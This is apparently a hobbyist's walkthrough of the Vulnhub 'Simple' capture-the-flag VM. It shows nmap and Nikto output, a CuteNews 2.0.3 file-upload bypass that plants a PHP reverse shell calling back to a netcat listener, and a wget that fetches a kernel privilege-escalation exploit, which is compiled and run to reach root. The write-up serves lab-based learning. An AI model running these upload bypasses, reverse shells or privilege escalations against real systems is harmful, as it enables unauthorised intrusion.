Simple CTF VM — Vulnhub.com

Netdiscover to find the IP of the box.

192.168.1.131 ←- Your IP will probably be different

nmap -T4 -A -v 192.168.1.131
80/tcp open http

Cool so we’ve got one port open and its a http 80 port so lets jump over to Firefox and see what the website look likes.

Firefox 192.168.1.131:80

We are bought to a web page with the following text on it

Not much to be given away at this stage but lets make a note that it runs on cutenews 2.0.3 and cute php.(we can use this to search the exploit-db.com database)

Lets run Nikto on the site and see if we can gather any more info.

nikto -host 192.168.1.131
- Nikto v2.1.6
 — — — — — — — — — — — — — — — — — — — — — — — — — 
+ Target IP: 192.168.1.131
+ Target Hostname: 192.168.1.131
+ Target Port: 80
+ Start Time: 2016–07–27 14:27:42 (GMT-4)
 — — — — — — — — — — — — — — — — — — — — — — — — — 
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9–1ubuntu4.6
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CUTENEWS_SESSION created without the httponly flag
+ No CGI Directories found (use ’-C all’ to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x47e 0x4ec3e1d077c80 
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016–07–27 14:28:06 (GMT-4) (24 seconds)
 — — — — — — — — — — — — — — — — — — — — — — — — — 
+ 1 host(s) tested

so a few things to look from the Nikto scan

OSVDB-3268: /docs/: Directory indexing found.
OSVDB-3092: /LICENSE.txt: License file found may identify site software.
OSVDB-3233: /icons/README: Apache default file found.

Let’s head over to exploit-db.com and see if we can use any of those vulnerabilities. Had a look around the site but nothing really jumped off the pages to me. There were mostly pages just referencing the OSVDB numbers and not actually how to implement them. (ILL COME BACK TO THIS IF I CANT GET ACCESS ANY OTHER WAY)

Whilst I am on the exploit-db site lets see what comes back when we search for cutenews 2.0.3

Boom!!! one exploit found — CuteNews 2.0.3 — Arbitrary File Upload PHP

CuteNews 2.0.3 Remote File Upload Vulnerability

Ok, so from what I understand of the exploit. I am going to have to upload a reverse shell php script disguised as a jpg and then use an app called Tamper Data to intercept the upload and change the files extension back to php. Cool ok.

I already have a reverse php shell script that I downloaded and modified for the Mr Robot VM so I don't need to recreate a new one or download it again. I’ll just make sure it has been updated with the new IP address so that it is calling home to the right address.

set_time_limit (0);
$VERSION = “1.0”;
$ip = ‘192.168.1.131’; // CHANGE THIS TO YOUR CURRENT IP
$port = 2007; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = ‘uname -a; w; id; /bin/sh -i’;
$daemon = 0;
$debug = 0;

The script was originally downloaded from Pentestmonkey and can be found at http://pentestmonkey.net/tools/php-reverse-shell

Ok so now I have updated the IP address in the script we need to save it with a jpg file extension.

We need to upload the jpg/php script using the avatar upload feature on the website.

Just before we do that we need to start the Tamper Data plugin so its running and can watch as I upload the file.

So now that is running lets upload the image as our avatar image and when Tamper Data see’s it we can intercept the upload and change the file extension back to php from the jpg extension.

Back in the terminal we need to start a netcat listener for when we trigger our php script to call home.

root@kali:~# nc -l -p 2007

(so after a few attempts and a bit if Googling to see where cutenews puts uploaded files) I navigated to http://192.168.1.131/uploads/

and found my script uploaded and waiting there.

Lets just link it to run it and jump back to our terminal with netcat listening.

root@kali:~# nc -l -p 2007
Linux simple 3.16.0–30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 15:59:18 up 1:43, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$

I love it when it all starts coming together, so we are now connected to the VM in a terminal. Lets start having a look around.

$ whoami
www-data

so we’re not root, lets see about escalating our privs.

$ su root
su: must be run from a terminal

(THIS IS THE SAME OUTPUT I HAD THE LAST TIME I USED THIS SCRIPT IN THE MR ROBOT VM)

The way I got round the error last time was to run the command

echo “import pty; pty.spawn(’/bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py

which should have upgraded my session into a full blown terminal session

www-data@simple:/$

now lets try and su into the root user

www-data@simple:/$ su root
Password:

(ok so that didn't quiet work to plan haha) it was worth a try though.

lets carry on looking around the box to see what we can find.

First lets find out what version of linux we are dealing with

cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=“Ubuntu 14.04.2 LTS”
NAME=“Ubuntu”
VERSION=“14.04.2 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=“Ubuntu 14.04.2 LTS”
VERSION_ID=“14.04”
HOME_URL=“http://www.ubuntu.com/”
SUPPORT_URL=“http://help.ubuntu.com/”
BUG_REPORT_URL=“http://bugs.launchpad.net/ubuntu/”

so its a Ubuntu box running 14.04.2 let’s see if we can find any exploits on exploit-db

There were a few and after trying some of them and not having any success I got to this one

https://www.exploit-db.com/exploits/37292/

Lets navigate to the tmp folder and try to download the exploit.

cd /tmp

www-data@simple:/tmp$ wget https://exploit-db.com/download/37292

wget https://exploit-db.com/download/37292
–2016–07–28 07:51:03–
https://exploit-db.com/download/37292
Resolving exploit-db.com (exploit-db.com)… 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location:
https://www.exploit-db.com/download/37292 [following]
–2016–07–28 07:51:04–
https://www.exploit-db.com/download/37292
Resolving
www.exploit-db.com (www.exploit-db.com)… 192.124.249.8
Connecting to
www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’

100%[======================================>] 5,123

Success!!!

www-data@simple:/tmp$ ls
37292 asdf.py

Ok so we have the exploit loaded into the box but we need to change the permissions and compile it to run, so we can use the following commands

www-data@simple:/tmp$ mv 37292 37292.c

www-data@simple:/tmp$ gcc 37292.c -o pwnd

www-data@simple:/tmp$ ls
37292.c asdf.py pwnd

www-data@simple:/tmp$ chmod +x pwnd

www-data@simple:/tmp$ ls
37292.c asdf.py pwnd

www-data@simple:/tmp$ ./pwn

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

That’s it the exploit has ran, lets see if it has worked.

# whoami
root

BOOM!!!! We’re now logged as root. Lets just go straight for the flag.

# cd /root
# ls
flag.txt

# cat flag.txt

That’s it, completed another CTF challenge. This one was a nice little VM with some tricky but really fun steps. This is my 5th VM now and I really feel that things are starting to come together. I’m finding that I don’t have to rely so heavily on Google now and I’m pulling exploits and steps from previous experience. It felt like I spent more time doing this write up than I actually spent hacking the box. On to the next one!!!

Thanks to Robert Winkel for creating this VM and as always for Vulnhub.com for hosting this and all the other amazing VM’s.


Originally published at pentestingandctf.tumblr.com.